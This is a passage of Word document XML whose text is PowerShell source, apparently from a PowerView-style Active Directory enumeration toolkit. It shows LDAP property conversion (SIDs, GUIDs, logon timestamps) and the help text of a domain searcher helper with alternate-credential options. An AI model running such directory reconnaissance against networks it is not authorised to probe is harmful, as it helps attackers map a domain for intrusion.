        <w:t xml:space="preserve">            # objects from Get-NetComputer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53359C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Object.dnshostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C9A88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E012CCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif ( [bool]($Object.PSobject.Properties.name -match "name") ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E205C56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # objects from Get-NetDomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A831AFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Object.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF749C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50198BEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F198AF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # strings and catch alls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F50258" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67B0EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB4E76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFDE11B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1934A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C467E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD9039F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CDF46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EBE6BA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A34BCCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Convert-LDAPProperty {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C348F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B8FFE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D41D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113AC8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Helper that converts specific LDAP property result fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF4FB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Used by several of the Get-Net* function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E325661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C28AFE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF17467" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D0B8FE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Properties object to extract out LDAP fields for display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B52F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CB090D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C271575" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F0C42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59362940" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD95DF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F65472" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13128E75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ObjectProperties = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EFC757" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EBF2E39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Properties.PropertyNames | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575CFD79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if (($_ -eq "objectsid") -or ($_ -eq "sidhistory")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574F0B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # convert the SID to a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12434339" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0],0)).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397691A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BEE3D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($_ -eq "objectguid") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36F0E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # convert the GUID to a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C523FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0278CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE12CC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif( ($_ -eq "lastlogon") -or ($_ -eq "lastlogontimestamp") -or ($_ -eq "pwdlastset") -or ($_ -eq "lastlogoff") -or ($_ -eq "badPasswordTime") ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7FEC77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # convert timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F7C15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($Properties[$_][0] -is [System.MarshalByRefObject]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B67E601" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we have a System.__ComObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF8CEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Temp = $Properties[$_][0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE6BC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7907DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Int32]$Low  = $Temp.GetType().InvokeMember("LowPart",  [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F4B9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15743448" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26065FC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9478C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E977CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5DEB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D29BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($Properties[$_][0] -is [System.MarshalByRefObject]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16C752" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # try to convert misc com objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE96D34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Prop = $Properties[$_]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0F4A9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE6A5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Temp = $Prop[$_][0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063338E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761A6B20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CA4D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Int32]$Low  = $Temp.GetType().InvokeMember("LowPart",  [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C631C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92FA06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E6B49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB67E59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectProperties[$_] = $Prop[$_]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A0A53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B04DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C69603" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($Properties[$_].count -eq 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D75B101" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ObjectProperties[$_] = $Properties[$_][0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07144AE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30898509" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C1884E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ObjectProperties[$_] = $Properties[$_]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996F099" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E991CBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F03B81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45278A39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    New-Object -TypeName PSObject -Property $ObjectProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE75B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25B7A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35027B66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B44BEB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="575530F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4486A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF092A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># Domain info functions below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F6F31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9989F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E7011" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="032E23E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-DomainSearcher {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C233134" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D234FCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8D632" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33FDFF87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Helper used by various functions that takes an ADSpath and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32409CD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        domain specifier and builds the correct ADSI searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD7975" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CB974CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C249D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7596A7FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to use for the query, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB7D002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39B3A5A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE60793" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02BD7670" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975469C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="632290AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40157B64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="132B81CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F3A1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54053D8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68175450" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSprefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A7832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46B20F06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Prefix to set for the searcher (like "CN=Sites,CN=Configuration")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7327F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2158F965" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D646790" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FE5F147" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73661545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E4AE829" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB93C8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F547D8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6761A15A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777E1C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D1D27DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F5FAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7155EBCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DomainSearcher -Domain testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843F8A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32A70F23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC7DD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A748FEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-DomainSearcher -Domain testlab.local -DomainController SECONDARY.dev.testlab.local</w:t>
      </w:r>
    </w:p>
